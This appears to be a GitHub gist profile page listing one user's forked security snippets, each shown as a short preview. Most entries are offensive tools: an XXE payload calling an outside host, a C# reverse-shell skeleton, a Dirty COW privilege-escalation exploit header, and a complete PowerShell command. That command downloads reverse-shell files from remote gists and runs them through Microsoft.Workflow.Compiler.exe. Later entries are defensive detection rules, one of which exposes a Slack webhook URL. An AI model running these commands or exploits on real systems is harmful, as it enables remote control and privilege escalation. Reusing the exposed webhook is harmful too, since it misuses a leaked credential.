Skip to content

Instantly share code, notes, and snippets.

View 0xa-saline's full-sized avatar

0xa-saline

183 followers · 379 following
View GitHub Profile
@0xa-saline
0xa-saline / XXE_payloads
Created November 30, 2018 12:36 — forked from api0cradle/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@0xa-saline
0xa-saline / powersct.sct
Created December 1, 2018 01:53 — forked from NickTyrer/powersct.sct
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
@0xa-saline
0xa-saline / Simple_Rev_Shell.cs
Created December 4, 2018 07:09 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@0xa-saline
0xa-saline / PowerShell_Command.txt
Created December 4, 2018 07:13 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
@0xa-saline
0xa-saline / Rev.Shell
Created December 4, 2018 07:16 — forked from BankSecurity/Rev.Shell
Abuse Microsoft.Workflow.Compiler.exe for compile C# Reverse Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity
@0xa-saline
0xa-saline / REV.txt
Created December 4, 2018 07:16 — forked from BankSecurity/REV.txt
Microsoft.Workflow.Compiler.exe Abuse for open a live C# Reverse Shell
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>Rev.Shell</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@0xa-saline
0xa-saline / c0w.c
Created December 12, 2018 13:50 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@0xa-saline
0xa-saline / elastalert_sysmon_powershell_suspicious_parameter_variation_needsfix.yml
Created December 25, 2018 06:45 — forked from Cyb3rWard0g/elastalert_sysmon_powershell_suspicious_parameter_variation_needsfix.yml
alert:
- slack
slack_webhook_url: https://hooks.slack.com/services/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
description: Detects suspicious PowerShell invocation with a parameter substring
filter:
- query:
query_string:
query: (process_path:"*\\powershell.exe" AND (" \-windowstyle h " OR " \-windowstyl
h" OR " \-windowsty h" OR " \-windowst h" OR " \-windows h" OR " \-windo h"
OR " \-wind h" OR " \-win h" OR " \-wi h" OR " \-win h " OR " \-win hi " OR
@0xa-saline
0xa-saline / sigma_sysmon_powershell_suspicious_parameter_variation_needsfix2.yml
Created December 25, 2018 06:45 — forked from Cyb3rWard0g/sigma_sysmon_powershell_suspicious_parameter_variation_needsfix2.yml
title: Suspicious PowerShell Parameter Substring
status: experimental
description: Detects suspicious PowerShell invocation with a parameter substring
references:
- http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
tags:
- attack.execution
- attack.t1086
author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
logsource:
@0xa-saline
0xa-saline / PSProcmon.psm1
Created February 24, 2019 06:03 — forked from mattifestation/PSProcmon.psm1
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
[Flags()]
enum RegistryOptions {
CloseKey = 0x00000001
QuerySecurityKey = 0x00000002
SetSecurityKey = 0x00000004
EnumerateValueKey = 0x00000010
QueryMultipleValueKey = 0x00000020
SetInformationKey = 0x00000040
FlushKey = 0x00000080